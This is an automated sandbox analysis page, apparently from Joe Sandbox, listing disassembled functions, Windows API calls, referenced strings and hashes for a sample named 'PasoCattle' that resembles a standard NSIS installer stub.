Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

